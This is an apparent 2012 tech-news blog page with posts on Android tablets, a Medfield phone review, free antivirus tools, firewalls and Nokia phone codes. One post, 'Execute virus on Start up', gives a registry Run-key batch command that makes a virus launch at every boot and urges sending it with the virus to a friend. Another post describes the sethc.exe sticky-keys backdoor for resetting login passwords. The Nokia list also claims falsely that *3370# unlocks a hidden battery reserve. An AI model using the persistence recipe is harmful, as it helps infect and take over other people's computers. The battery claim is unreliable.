All about new technology update

New tech. updated daily so do visit the blog

Wednesday, August 29, 2012

How To Save Battery Power of Android Phone/Tablet – Android Battery Saving Tips


How long does your phone bear not to call “BATTERY LOW”. Have you ever noticed where does the Battery juice goes? Who does sucks up these juices?

These are some questions that may not come to everyone’s mind everyday but they bear a lot of importance in your life. If your battery runs out too quickly, you to find out some feeding point

3 Signs That Your Hard Drive Is Going To Fail

Nowadays almost every person likes to keep his personal documents, videos, images, or audio files on their computer hard drive. Compared to the old ways of storing data like paper or diary, hard drives have a limited lifetime which is around 5-10 years.

How to Download New Movies For Free

Difficulty: Easy

Introduction: Here we will tell you the best sites for downloading newly released movies. How to download movies

List of Best Torrent Clients for Windows

Understanding/difficulty: Easy

Introduction: List of best torrent clients for windows.
  Here we will share some of the best torrent clients for windows. This torrent clients

Sunday, August 19, 2012

How to use Google Voice on Nexus 7 for making Free Calls in US ? – Nexus 7 Hack


Google Nexus 7 android tablet, special of its kind as it doesn’t support any call facility as HSPA or LTE data connectivity options are missing. As Nexus 7 is not like other tablets as we see in market like Samsung Galaxy Tab which supports making call facilities instead of that, Nexus 7 is a very basic android tablet which allows you to surf internet, play games, email your contacts, video chats on Skype/Gtalk. Supporting only Wi-Fi services, Nexus 7

Sunday, July 22, 2012

Look out, Nexus 7: iPad mini coming this year, report claims


Apple will release a 7- or 8-inch iPad that will disrupt the low-end tablet market before the end of the year, a new Bloomberg report claims.

Google sells out of 16GB Nexus 7 tablet




Google has stopped taking new orders for the 16GB model of the Nexus 7 tablet in the Google Play store, a sign Google did not prepare for the tremendous demand the device has attracted thus far.
The Nexus 7 has seen much interest since it was introduced about a month ago at Google’s I/O

Saturday, June 30, 2012

"‘Amazingly fast’ Google Nexus 7 wows tech pundits"



  The Nexus 7. Getty Images

Google launched its very own tablet the Nexus 7, which it co-manufactured with Taiwanese computer maker Asustek.

The tablet called the Nexus 7 because of a 7-inch screen,

"No Flash Support In Android 4.1 Jelly Bean"



Adobe announced last year that they would be ending support for Flash on mobile devices, and now Adobe has announced that there will be no Flash

Monday, June 18, 2012

Someone installs Mac OS on Nook Simple Touch


Forget Android or Windows 8. Someone decided to install a Mac OS on a Nook. A 16-year-old version of Mac OS. On a newer device. Granted, the Nook Simple Touch is not a high end tablet, but it is modern. So now this person knows what it would be like to have a Mac OS tablet as if it were 16 years ago were.












It was done by members of the 68k

Sharp Announces Feel UX UI For Its Android Smartphones

Sgarp is the latest company to announce a custom user interface for its Android range of smartphones, call the Feel UX, Sharp intends to launch this new UI later this summer.
Sharp teamed up with design agency ‘frog’ to produce its Feel UX user interface, and it will first appear on Sharps upcoming AQUOS android smartphones.




The new user interface will be made of of personalized lock

Verizon Announces FiOS Quantum With Speed Up To 300Mbps


Verizon has announced the launch of their latest Internet service, called FiOS Quantum, the new service will offer download speeds of up to 300Mbps and upload speeds of up t 65Mbps.
The new 300Mbps FiOS Quantum service from Verizon will cost $204.99 and you will have to sign up to a two year agreement with Verizon.


“A revolution in speed has arrived,” said Bob Mudge,

NEC Announces LifeTouch L Android Tablets


NEC Has announced two new Android tablets called the NEC LifeTouch L, both devices are very similar in specifications although one is designed for consumers whilst the other is designed for business users.
The NEC LifeTouch L comes with a 10.1 inch touchscreen display

Facebook Agrees to Pay out $10 Million to Settle Sponsored Stories Suit

                              !!!!!OMG!!!!!

Facebook was sued by five different users over their profile being used in Facebook’s sponsor stories advertisements on the social network. When the suit was first filed,

Saturday, June 16, 2012

10 Best FREE Apps For Samsung Galaxy S3

Just bought a SGS3 or looking forward to buy it? Need some apps for the most expensive Android phone yet? This is the right place where you can find a list of best FREE apps for Samsung Galaxy S3.



GS III has received a lot of criticism since its launch

Tuesday, June 5, 2012

Speed Up Your Web Browsing In A Few Clicks: A Brief Introduction To DNS




Every millisecond counts when you’re browsing the web, and if you’d like to eke a bit more speed out of your internet connection, you can change your DNS server to make those

Thursday, May 10, 2012

How Do Anti-Virus programs Detect Virus?

How Anti-Virus Do programs Detect Virus?

Many Of us wonder how our Antivirus software scans for Virus, Worm, Trojan.We scan a Folder Or Local Drive for Virus but what actually happens during the Virus Scan Period
5 Techniques used by Anti Virus Program to Detect Malware:
1.Signature Based Scan.
2. Heuristic Based Scan.
3. Threat Sense Technology.
4. Artificial Intelligence (Behavioral Antivirus Programs).
5. Proactive Defense.
1. Signature Based Scan:

Secure your Computer by Sticky Key Attack

Hello Guys,
This Time I wanna tell you some more about the Sticky keys  Attack  i.e totally about making a backdoor  in other system by replacing sethc.exe file with cmd.exe and after that u have to press Shift key 5 times on login screen and you get the cmd or command Prompt on login screen and run the ‘net user ’ command to change the password  of administrator or any account in the system. This is all about the attack, now how can I Secure my system by this attack for that you have to fallow few steps  as fallowing:
Windows XP:
  1. Check for sticky key backdoor

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.
So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.
So let us take we are having a virus demo.exe.
Follow the following steps for sending it on Start up.
1. Open a Notepad file
2. Write down the following command
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe
3. Now save the notepad file with any name say kyrion but extension should be bat. Means we will have to create a batch file eg: kyrion.bat
4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.
5. Now the impact of the virus will also be visible after the restart of the system.


Nokia Mobile Phone HACK Codes

1.  Imagine ur cell battery is very low, u r expecting an important call and u don’t have a charger.
     Nokia instrument comes with a reserve battery. To activate, key is “*3370#”
     Ur cell will restart with this reserve and ur instrument will show a 50% increase in battery.
     This reserve will get charged when u charge ur cell next time.
     *3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time    is reduced by approx 5%
     #3370# Deactivate Enhanced Full Rate Codec( EFR)
     *#4720# Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
     *#4720# Deactivate Half Rate Codec
2.  *#0000# Displays your phones software version,
      1st Line :  Software Version,
      2nd Line : Software Release Date,
      3rd Line : Compression Type
3.  *#9999# Phones software version if *#0000# does not work.
4.  *#06# For checking the International Mobile Equipment Identity (IMEI Number).
5.  #pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).
6.  #pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).
7.  #pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).
8.  #pw+1234567890+4# SIM Card Lock Status.(use the “*” button to obtain the “p,w” and “+” symbols).
9.  *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone).
10.  *#21# Allows you to check the number that “All Calls” are diverted to.
11.  *#2640# Displays security code in use.
12.  *#30# Lets you see the private number.
13.  *#43# Allows you to check the “Call Waiting” status of your phone.
14.  *#61# Allows you to check the number that “On No Reply” calls are diverted to.
15.  *#62# Allows you to check the number that “Divert If Unreachable(no service)” calls are diverted to.
16.  *#67# Allows you to check the number that “On Busy Calls” are diverted to.
17.  *#67705646# removes operator logo on 3310 & 3330
18.  *#73# Reset phone timers and game scores
19.  *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
20.  *#7760# Manufactures code
21.  *#7780# Restore factory settings
22.  *#8110# Software version for the nokia 8110
23.  *#92702689# (to remember *#WARRANTY#)
      Displays -
      1. Serial Number,
      2.Date Made
      3.Purchase Date,
      4.Date of last repair (0000 for no repairs),
      5.Transfer User Data.
      To exit this mode -you need to switch your phone off then on again
24.  *#94870345123456789# Deactivate the PWM-Mem
25.  **21*number# Turn on “All Calls” diverting to the phone number entered
26.  **61*number# Turn on “No Reply” diverting to the phone number entered
27.  **67*number# Turn on “On Busy” diverting to the phone number entered
  Each command is prefixed with either one or two * or # characters as follows:
   ** Register and Activate
   * Activate  
    ## De-Register (and Deactivate)
    # Deactivate
    *# Check Status
    © Call button
Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key – this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).
Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
Display IMEI *#06#
Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate  **67*number#©
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring
Activate barring all outgoing calls (see Security to set code) **33*code#©
Deactivate barring all outgoing calls #33*code#©
Check status of barring all outgoing calls *#33#©
Activate barring all calls **330*code#©
Deactivate barring all calls #330*code#©
Check status of barring all calls *#330*code#©
Activate barring all outgoing international calls **331*code#©
Deactivate barring all outgoing international calls #331*code#©
Check status of barring all outgoing international calls *#331#©
Activate barring all outgoing international calls except to home country **332*code#©
Deactivate barring all outgoing international calls except to home country #332*code#©
Check status of barring all outgoing international calls except to home country *#332#©
Activate barring all outgoing calls **333*code#©
Deactivate barring all outgoing calls #333*code#©
Check status of barring all outgoing calls *#333#©
Activate barring all incoming calls **35*code#©
Deactivate barring all incoming calls #35*code#©
Check status of barring all incoming calls *#35#©
Activate barring all incoming calls when roaming **351*code#©
Deactivate barring all incoming calls when roaming #351*code#©
Check status of barring all incoming calls when roaming *#351#©
Activate barring all incoming calls **353*code#©
Deactivate barring all incoming calls #353*code#©
Check status of barring all incoming calls *#353#©
Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)
CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one’s own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©

Wednesday, May 9, 2012

Lava Xolo X900 Review - The First Intel Medfield Phone

Lava Xolo X900 Review - The First Intel Medfield Phone

For Intel, the road to their first real competitive smartphone SoC has been a long one. Shortly after joining AnandTech and beginning this journey writing about both smartphones and the SoC space, I remember hopping on a call with Anand and some Intel folks to talk about Moorestown. While we never did see Moorestown in a smartphone, we did see it in a few tablets, and even looked at performance in an OpenPeak Tablet at IDF 2011. Back then performance was more than competitive against the single core Cortex A8s in a number of other devices, but power profile, lack of ISP, video encode, decode, or PoP LPDDR2 support, and the number of discrete packages required to implement Moorestown, made it impossible to build a smartphone around. While Moorestown was never the success that Intel was hoping for, it paved the way for something that finally brings x86 both down to a place on the power-performance curve that until now has been dominated by ARM-powered SoCs, and includes all the things hanging off the edges that you need (ISP, encode, decode, integrated memory controller, etc), and it’s called Medfield. With Medfield, Intel finally has a real, bona fide SoC that is already in a number of devices shipping before the end of 2012.
In both an attempt to prove that its Medfield platform is competitive enough to ship in actual smartphones, and speed up the process of getting the platform to market, Intel created its own smartphone Form Factor Reference Design (FFRD). While the act of making a reference device is wholly unsurprising since it’s analogous to Qualcomm’s MSM MDPs or even TI’s OMAP Blaze MDP, what is surprising is its polish and aim. We’ve seen and talked about the FFRD a number of times before, including our first glimpse at IDF 2011 and numerous times since then. Led by Mike Bell (of Apple and Palm, formerly), a team at Intel with the mandate of making smartphone around Medfield created a highly polished device as both a demonstration platform for OEM customers and for sale directly to the customer through participating carriers. This FFRD has served as the basis for the first Medfield smartphones that will (and already are) shipping this year, including the Orange Santa Clara, Lenovo K800, and the device we’re looking at today, the Lava Xolo X900. Future Medfield-based devices will deviate from the FFRD design (like the upcoming Motorola device), but will still be based loosely on the whole Medfield platform. For now, in the form of the X900 we’re basically looking at the FFRD with almost no adulteration from carriers or other OEMs.
The purpose and scope of this review is ambitious and really covers two things - both an overview of Intel’s Medfield platform built around the Atom Z2460 Penwell SoC, and a review of the Xolo X900 smartphone FFRD derivative itself.

The Device

Beginning April 23rd, Intel, through Lava International, began selling the Xolo X900 smartphone in India for INR 22000 (~$420 USD). As we’ve stated before, the design and construction of the Xolo X900 almost identically mirrors the Intel FFRD we’ve seen before, from the specifications and Medfield platform itself, to industrial design and exterior buttons.
It’s a testament to the polish of the reference design that Mike Bell’s team put together that Intel is confident enough to basically sell exactly that device through carrier partners. I’ll admit I was skeptical upon hearing that Intel would basically be selling their MDP to customers, but the device’s fit and polish exceeded my expectations and are clearly those of something ready for customer abuse. First up are the X900 specifications in our regular table, Xolo also has its own nicely presented specifications page for the X900 online.
Physical Comparison
Apple iPhone 4S Samsung Galaxy S 2 Samsung Galaxy Nexus (GSM/UMTS) Lava Xolo X900
Height 115.2 mm (4.5") 125.3 mm (4.93") 135.5 mm (5.33") 123 mm (4.84")
Width 58.6 mm (2.31") 66.1 mm (2.60") 67.94 mm (2.67) 63 mm (2.48")
Depth 9.3 mm ( 0.37") 8.49 mm (0.33") 8.94 mm (0.35") 10.99 mm (0.43")
Weight 140 g (4.9 oz) 115 g (4.06 oz) 135 g (4.8 oz) 127 g (4.5 oz)
CPU Apple A5 @ ~800MHz Dual Core Cortex A9 1.2 GHz Exynos 4210 Dual Core Cortex A9 1.2 GHz Dual Core Cortex-A9 OMAP 4460 1.6 GHz Intel Atom Z2460 with HT (1C2T)
GPU PowerVR SGX 543MP2 ARM Mali-400 PowerVR SGX 540 @ 304 MHz PowerVR SGX 540 @ 400 MHz
RAM 512MB LPDDR2-800 1 GB LPDDR2 1 GB LPDDR2 1 GB LPDDR2 @ 400 MHz
NAND 16GB, 32GB or 64GB integrated 16 GB NAND with up to 32 GB microSD 16/32 GB NAND 16 GB NAND
Camera 8 MP with LED Flash + Front Facing Camera 8 MP AF/LED flash, 2 MP front facing 5 MP with AF/LED Flash, 1080p30 video recording, 1.3 MP front facing 8 MP with AF/LED Flash, 1080p30 video recording, 1.3 MP front facing
Screen 3.5" 640 x 960 LED backlit LCD 4.27" 800 x 480 SAMOLED+ 4.65" 1280x720 SAMOLED HD 4.03" 1024x600 LED backlit LCD
Battery Internal 5.3 Whr Removable 6.11 Whr Removable 6.48 Whr Internal 5.4 Whr
It’s interesting to me that Intel, Qualcomm, and others identified and went with WSVGA (1024x600) for their reference designs in roughly the same 4" size. It’s a display form factor that corresponds almost exactly to 300 PPI, and looks great, but more on that later. The rest of the X900 is basically what you’d expect for a smartphone of this generation, and on par with the Android competition that Intel was targeting, perhaps minus microSD expansion.
The design language of the X900 (and Intel FFRD) is a pretty obvious nod to the iPhone 4/4S design, complete with chrome ring, similar button placement, and a few other things. Likewise, the X900 uses a microSIM whose tray is located on the right side and makes use of an ejector port and tool. Below that is the X900’s two-stage camera button, and then speaker port. There’s a matching speaker port on the other side in the same area.
MicroUSB is located at the very bottom slightly off center, and microHDMI is on the left side. Up at the top is power/standby and the standard headphone jack. There’s no real surprises here, and despite being entirely plastic-clad, the X900 feels pretty decent in the hand.
The backside is a soft touch material which we’ve seen and felt on countless other smartphones before. The only downside to the X900 design is lack of a user replaceable battery - the backside is permanently attached. At the top is the 8 MP camera port, adjacent LED flash, and secondary microphone for noise suppression.

The front of the X900 is likewise pretty standard fare, up top are the 1.3 MP front facing camera, speaker grille, ambient light sensor, and proximity sensor. At the bottom are the four Android capacitive buttons whose design mirrors the FFRD we’ve seen before.


Again there’s nothing super crazy about the design or construction of the X900, it’s an extremely polished reference designed turned consumer electronic that feels solid and ready for use as a daily driver if you’re up for it. Enough about the superficial stuff though, let’s talk about what everyone wants to know about - Medfield and Android on x86.

Monday, April 30, 2012

Aakash 2: Data wind launched Ubislate 7c & Ubislate 7+

Aakash tablet maker’s Datawind UK based company which was previously been highly criticised for there  first Aakash tablet to be very slow , Unusual Crashing of apps , and at the delievery time screen broken. Now with new hope Datawind launches two new tablets Ubislate 7+ and Ubislate 7c which is also called as the commerical version of Aakash Tablet. As the previous Aakash lagged in terms of processor [256 MHz] , Internal Memory and a marketplace for downloading Android apps and games.

Now everything taken into consideration after very huge customers feedback. Datawind has succeeded to create two tablets which will not make the customers this time unhappy. Ubislate 7+ and 7c are very much identical in specification except Display and internal memory storage.

In Ubislate 7c

you would get 7 inch capacative touch screen, 4GB internal onboard memory, Android 2.3 Gingerbread version with a promise from company that it will soon get an ICS updates, Cortex A8  800MHz processor which won’t let apps and games to be crashed unusally. For connectivity it has Sim card slot which only supports GPRS connection sorry guys still it doesnot comes with 3G sim connectivity but you can use 3G Dongles or Modem for the 3G connectivity, Micro-SD card slot available with no memory card available with the purchase and it has full sized USB port which can be used connect Pen-drives, modems, Webcams and other peripherls devices. It comes with a price tag of Rs. 3999 which is from my point of view it is way much cheaper as the features and specs it offers.

Ubislate 7+

It has same Specifications and features as Ubislate 7c had but it has 7 inch  800*600 pixels resistive touchscreen with 2GB internal memory.It’s price is RS.2999 which is also great.

What are the new features added on these two tablet which is also called as sequeal of Aakash tablet or Aakash 2 :

Getjar embeded in it for downloading Games and apps. Getjar also offers wide range of  premium apps for free. DataWind also ties up with  Indian Express group, InMobi, Poketalk and Yahoo India to increase the usability of the tablet.



DATAWIND has also partnered with give aircel to give you unlimited data at Rs.98

Which one should you go for Ubislate 7+ or Ubislate 7c?

As Ubislate comes in Rs.2999 but i would recommend you to for Ubislate 7c which is about Rs.3999 . As Ubislate7+  has  resistive touchscreen which decreases the overall user interface experiences and Hello, Guys don’t you have learn anything from the first  Aakash tablet it has resistive touchscreen which was much like the china mobile touchscreen choice is yours.

Firewall administration




                                                                         Firewall


In my previous two articles I showed you how to secure your LAN and WLAN. In that i had mentioned the firewall factor. In this article I am going to show you the uses of firewall and its administration. Firewall Administration is ensuring the proper management, configuration, and change management of it.It is comprised of controlling access to the platform, platform operating system builds, log reviews, time synchronization and backups.Hence firewall is very important in a network. Some of the advantages and uses of firewall are as follows.
  • The main and the most important factor of firewall is your computer security. It gives a sence of a secure connection of your computer.
  • The most inexpensive and security tool.
  • You can monitor incoming and outgoing security alerts and the firewall company will record and track down an intrusion attempt depending on the severity.
  • Some firewalls are also useful as they detect viruses and worms.
  • All firewalls can be tested for effectiveness by using products that test for leaks or probe for open ports.
What is firewall administration ?
Personal firewall software is designed to prevent connections between the network and your computer, except for programs that the firewall software knows that they are not infected.
  • Network Magic needs to make network connections to set up sharing and check for updates, your firewall software needs to allow these connections.
  • Network Magic is permitted to make outbound communications.
  • Inbound communication from other computers running Network Magic is permitted to get past the firewall to Network Magic.
  • Outgoing communication: Most software firewalls have settings for specific program control.
As we say that any coin has two opposite sides firewall also consists of some of the disadvantages like:
  • Firewalls cannot protect you from internal sabotage within a network or from allowing other users access to your PC.
  • Firewalls cannot edit indecent material like pornography, violence, drugs and bad language. This would require you to adjust your browser security options or purchase special software to monitor your childcare’s Internet activity.

New Variant Of Flashback For Mac Attacks Again [Updates]


Flashback, the Mac OS X trojan , just won’t go away in spite of numerous Apple updates designed to patch the Javascript security hole that Flashback was jumping through.
The latest version, discovered on Monday by the Intego, has been labeled Flashback.S. It spreads using the same vulnerability as earlier versions, which means that it requires no password prompt to install itself on a targeted system.
There’s a new trick, too – this variant will delete files in ~/Library/Caches/Java/cache to remove traces of the trojan and prevent the recovery of samples by security firms (a ruse that,
obviously, hasn’t worked).

If you haven’t already updated your Mac (shame on you!), do so now. Apple’s updates to patch the flaw used by Flashback will work against this and all other know versions. The patch can be downloaded using the update service built in to OS X.
You can also protect yourself by installing an antivirus. According to Intego, Flashback does not even attempt to install itself on systems protected by certain software. This has been true since the original version and is likely an attempt to slow the detection of new variants.

The 10 Best Free Anti-Virus Programs




This article really needs no introduction. There are many free anti-virus programs on the market, and you want to sort the wheat from the chaff. Fair enough. Documented here are the 10 best antivirus programs on the market.
While I won’t attempt to rank the programs here (in many ways the programs can’t be compared), I will attempt to give you an idea of under what circumstances they will be useful.
The order here for the 10 best antivirus programs  is mostly random, so be sure to read every entry if you want an idea of what will work for you.

Microsoft Security Essentials

10 best antivirus programs
Released by Microsoft in late 2009, Microsoft Security Essentials sports more than a typically verbose Microsoft name: it’s also a really good antivirus. Lightweight enough to run on older machines without crippling their performance, yet competent enough to handle most viruses and malware out there.
Perhaps the best part of MSE is its simplicity. As you can see, the user interface is really clear, with large buttons for the most basic functions. This is important if you’re setting it up on a computer for someone who is not computer-savvy.
Finally, MSE is completely free – there’s no professional version you can upgrade to. In fact, it’s even permissible to use in business situations, meaning you can use it at work without breaking the law. This alone sets it above most of the other selections for the 10 best antivirus programs.
 download MSE here.

AVG Free

This one recently topped our Movers and Shakers list of the top downloaded free anti-virus programs. But just because AVG is popular doesn’t mean it’s not great.
AVG has become synonymous with free anti-virus, and there’s a reason for this: AVG offers complete malware protection, with considerably less bloat than the top pay-to-use antivirus clients. And while AVG Free does constantly remind you that you could pay for the professional version of the program, it does this without ever getting in the way of the program’s core purpose: protecting you from viruses.
10 best antivirus programs
Though when it comes to upgrading one version of AVG to another, you need to make sure you’re good at reading what’s on screen, because the free download is only available via a tiny link at the bottom of the screen””the site really wants you to get the paid version. When upgrading to version 9 recently, for example, check out how hidden the free download was:
10 best antivirus programs
Not exactly a big link, is it? Figure this minor inconvenience out, however, and AVG is a a really good free anti-virus. Download AVG.

Avira Free

free antivirus programs
In terms of simplicity, Avira’s right up there with MSE. It’s fairly lightweight, too, so the comparison is quite apt. While Avira does have a paid professional version to peddle, much like AVG, it’s not quite as aggressive as AVG in peddling it. I’d say Avira is solid and worth looking into for sure. Download Avira Free here.

Avast! Free

If this competition were for the coolest name, the piratey Avast! would win hands down. Even though that’s not what we’re discussing, Avast! stands up pretty well. This is one of the top free anti-viruses on the market, and for good reason: it’s remarkably complete. Expect great all-around protection, including against trojans and spyware. You can also expect constant reminders that there’s a free version you can upgrade to, on your desktop and in your inbox. Still, the protection is solid.
Download Avast! here.

Malwarebytes

free antivirus programs
Whatever your default anti-virus is, you need Malwarebytes too. This program doesn’t run in your system background and constantly protect you, but when you run into a problem running Malwarebytes will usually take care of what other programs can’t. I’ve saved more than a few unbootable systems by running Malwarebytes from safe mode. This program takes care of any form of malware you throw at it, so keep it around. In fact, I’d keep this one on your flash drive in case you ever need to fix a computer for a friend (and if you’re reading this blog, you probably will).
Download Malwarebytes.

ComboFix

Consider this the nuclear option. If you know you’ve got a virus, but your usual anti-virus program can’t handle it, and Malwarebytes can’t handle it, it’s time for ComboFix. This program isn’t friendly: it runs from a command window and is proud of it.  And this is not a program you should use if you don’t know what you’re doing, because it can have devastating effects in the hands of the uneducated. But when all else fails, ComboFix delivers. Every geek should have this one on their keychain.
Download Combofix.

Clamwin

free antivirus programs
Clamwin is the Windows version of ClamAV, the main Linux anti-virus on the market. ClamWin is flawed in many ways: it simply scans instead of offering real-time protection, it doesn’t really do non-virus malware and it’s not exactly easy to use. Still, having ClamWin around doesn’t cost anything, and you can never have enough scanning tools in your arsenal.
Download ClamWin and see if you like it.

Panda Cloud AntiVirus

totally free antivirus programs
At first I thought the idea of a cloud-based antivirus was stupid, because it would only work while I’m online. Then it occurred to me: why the heck do I need an anti-virus when I’m offline?
As the name suggests, Panda Cloud Antivirus stores its virus definitions online. There’s an upside to this: your definitions are always up to date. There’s a downside, too, however: your anti-virus is constantly making use of your network connection.
I’d say this is a really good idea for underpowered PCs with constant access to the net. Like, say, a netbook. But if you’ve got a netbook you shouldn’t be using Windows anyway; switch to Jolicloud and you’ll have a functional netbook operating system immune to practically every virus.
 download Panda Cloud Antivirus if you’re interested.

Comodo Firewall + Antivirus

Comodo is best known for its free firewall, but it also offers a bundled firewall and antivirus program. While the Comodo firewall isn’t the easiest to use, and the antivirus doesn’t include protection for non-virus forms of  malware, this one’s worth mentioning if you’re looking for a free security suite which includes both a firewall and anti-virus protection.
totally free antivirus programs
Download Comodo Free here.

Common Sense 2011

This one’s unusual in that it’s free and considered by far the best protection out there, yet can’t be downloaded anywhere. Without it, however, even the best security software is rendered useless.
If you haven’t already figured this out, Common Sense 2011 isn’t a product you can download so much as it is a state of mind. If you’re going to be free of viruses and malware you need to use your head while browsing the web. The most important thing to remember is this: if something sounds too good to be true, it probably is””and your computer will probably be compromised.
Free porn usually isn’t. Warez are best to be avoided altogether. Nigerians that need your help transferring money are never actually princes or princesses. You get the idea: avoid shady sites online and you’ll find you’ll get far less malware on your machine.

Conclusion

There are a lot of great free anti-virus programs out there, but what you use is mostly a matter of preference. Myself, I use Microsoft Security Essentials on my Windows machine because it’s free, lightweight and will never ask me for money. But I also make sure I always have Malwarebytes on my thumb drive for quickly removing viruses and malware from the computers of friends and family.
What about you? Which free anti-virus do you prefer? Commenting is good for you, so do so!

Saturday, April 28, 2012

Sony Launches First Waterproof Handycam (video)

Sony has this week added a new waterproof Handycam to their range of video recorders in the form of the Sony HDR-GW77V. Which has been designed to go under water in depths of up to 16 ft for up to 60 minutes.
The Sony HDR-GW77V Handycam is equipped with a 20.4-megapixel resolution, full 1080p video capture @ 60fps, and 10x optical zoom. With 16GB of internal storage that can be expanded using SDHC or Memory Stick Micro cards to suit your needs.


Its also equipped with a neat fold out LCD viewing panel and measures just 1.2 (width) x 4.15 (height). Watch the video below to see it drop tested.As well as being waterproof the new Sony HDR-GW77V Handycam is also rugged and can withstand 5ft drops.

Its also equipped with a neat fold out LCD viewing panel and measures just 1.2 (width) x 4.15 (height). Watch the video below to see it drop tested.As well as being waterproof the new Sony HDR-GW77V Handycam is also rugged and can withstand 5ft drops.
Unfortunately no information on pricing or worldwide availability has been released for the Sony HDR-GW77V Handycam as yet, but it will soon be arriving in Japan for around 70,000 yen around $862.
Source: CNET

BlackBerry Curve 9320 Press Shots Revealed

The guys over at the Verge have got their hands on some press shots of RIM’s latest BlackBerry smartphone, the BlackBerry Curve 9320, the device is designed for the budget and emerging markets.
RIM has yet to officially announce the new BlackBerry Curve 9320, so we don’t have the full specifications, what we do know is that it will comer with a physical QWERTY keyboard and will run BlackBerry OS 7.1.
BlackBerry Curve 9320
The BlackBerry Curve 9320 is expected to be officially announced next week, as soon as we get some more information, including the handsets full specifications, and some pricing we will let you guys know.
Source The Verge

Apple’s New iPad Launched In Nine More Countries

Apple’s new iPad has already become very popular for the company, and now Apple has launched their new iPad in nine more countries around the world, making the device available in a total of 57 different countries.
From today the new iPad is available Colombia, Estonia, India, Israel, Latvia, Lithuania, Montenegro, South Africa and Thailand, which are bound to add to Apple’s massive sales of the new device.


We got a look at Apple’s recent financial reports earlier in the week, where they reported that they had sold more than 35 million iPads in their most recent financial quarter.
Source The Next Web

Android 5.0 Jelly Bean Headed To GSM Samsung Galaxy Nexus First?

The next version of Google’s Android OS, which will be Android 5.0 is rumored to be codenamed Android Jelly Bean, and it is rumored to launch some time in quarter three of 2012.
It looks like the GSM Samsung Galaxy Nexus may be the first handset to get the Android 5.0 Jelly Bean update, the information regarding the update comes from a crash log that refers to a mysterious software profile called ‘takju’ which was discovered by the guys from Android Police.


We still don’t have any official confirmation from Google on when Android 5.0 Jelly Bean will launch, and we suspect we will have to wait a couple of months to get confirmation.
Source Ubergizmo

Entry Level Sony Xperia ST21i Android 4.0 Smartphone Leaked

It looks like Sony has a new budget Android smartphone in the works, the Sony ST21i which is expected to come with the latest version of Google’s mobile OS, Android 4.0 Ice Cream Sandwich.
The guys over at Techblog.gr managed to get their hands on some photos of the new Sony ST21i, which you can see below and the device is rumored to be powered by a single core Snapdragon processor clocked at 800MHz.


Other specifications on the Sony ST21 i include an Adreno 200 GPU, plus a 3.2 inch LCD touchscreen display with a resolution of 320 x 480 pixels, and a 3 megapixel rear facing camera.
As soon as we get some more specifications on this new entry level Android smartphone from Sony, along with some pricing details we will let you guys know.
Source GSM Arena

Saturday, April 21, 2012

Secure your LAN



In thi short tutorial where you will come to know the basics of LAN security. As far as LAN security is concerned firewalls, anti-viruses play an important role in it. Viruses can affect your pc or your entire network. Hence it is very important to ensure that your connection is secure. Security of LAN is sub-divided in two parts.
  • Manual security
  • With tools security.
